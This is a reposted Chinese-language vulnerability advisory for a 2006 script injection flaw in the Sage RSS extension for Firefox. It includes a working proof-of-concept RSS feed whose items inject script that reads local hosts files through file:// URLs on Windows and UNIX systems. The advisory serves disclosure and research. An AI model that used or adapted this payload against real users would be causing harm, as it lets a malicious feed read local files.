[转载]Firefox Sage扩展RSS Feed脚本注入漏洞
信息来源:绿盟科技Firefox Sage扩展RSS Feed脚本注入漏洞
发布日期:2006-09-08
更新日期:2006-09-12
受影响系统:
Mozine Sage 1.3.6
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 19928
sage是Firefox的一个灵巧的RSS和Atom feed聚合扩展。
sage在处理RSS feed中的内容标签时存在输入验证错误,远程攻击者可能利用此漏洞在用户机器上执行恶意代码。
如果用户受骗添加了恶意的RSS feed并浏览了其内容的话,就会导致在本地环境中注入并执行任意HTML和脚本代码。
<*来源:pdp ([email]pdp.gnucitizen@googlemail.com[/email])
链接:[url]http://secunia.com/advisories/21839/[/url]
[url]http://www.gnucitizen.org/blog/cross-context-scripting-with-sage/[/url]
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<?xml version="1.0" encoding="UTF-8" ?>
- <rss version="2.0" xmlns:content="[url]http://purl.org/rss/1.0/modules/content/[/url]">
- <channel>
<title>Cross Context Scripting with Sage</title>
- <item>
<title>WINDOWS: works with "Allow HTML Tags" off</title>
- <content:encoded>
- <![CDATA[ <script>try { request = new XMLHttpRequest(); request.open("GET", "file:///C:/WINDOWS/system32/drivers/etc/hosts"); request.send(null); alert(request.responseText); } catch(e) {}</script>
]]>
</content:encoded>
</item>
- <item>
<title>WINDOWS: works with "Allow HTML Tags" on</title>
- <content:encoded>
- <![CDATA[ <script>try { request = new XMLHttpRequest(); request.open("GET", "file:///C:/WINDOWS/system32/drivers/etc/hosts"); request.send(null); alert(request.responseText); } catch(e) {}</script>
]]>
</content:encoded>
</item>
- <item>
<title>WINNT: works with "Allow HTML Tags" off</title>
- <content:encoded>
- <![CDATA[ <script>try { request = new XMLHttpRequest(); request.open("GET", "file:///C:/WINNT/system32/drivers/etc/hosts"); request.send(null); alert(request.responseText); } catch(e) {}</script>
]]>
</content:encoded>
</item>
- <item>
<title>WINNT: works with "Allow HTML Tags" on</title>
- <content:encoded>
- <![CDATA[ <script>try { request = new XMLHttpRequest(); request.open("GET", "file:///C:/WINNT/system32/drivers/etc/hosts"); request.send(null); alert(request.responseText); } catch(e) {}</script>
]]>
</content:encoded>
</item>
- <item>
<title>UNIX: works with "Allow HTML Tags" off</title>
- <content:encoded>
- <![CDATA[ <script>try { request = new XMLHttpRequest(); request.open("GET", "file:///etc/hosts"); request.send(null); alert(request.responseText); } catch(e) {}</script>
]]>
</content:encoded>
</item>
- <item>
<title>UNIX: works with "Allow HTML Tags" on</title>
- <content:encoded>
- <![CDATA[ <script>try { request = new XMLHttpRequest(); request.open("GET", "file:///etc/hosts"); request.send(null); alert(request.responseText); } catch(e) {}</script>
]]>
</content:encoded>
</item>
</channel>
</rss>
建议:
--------------------------------------------------------------------------------
厂商补丁:
Mozine
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
[url]http://addons.mozine.org/extensions/moreinfo.php?id=12%22[/url]
页:
[1]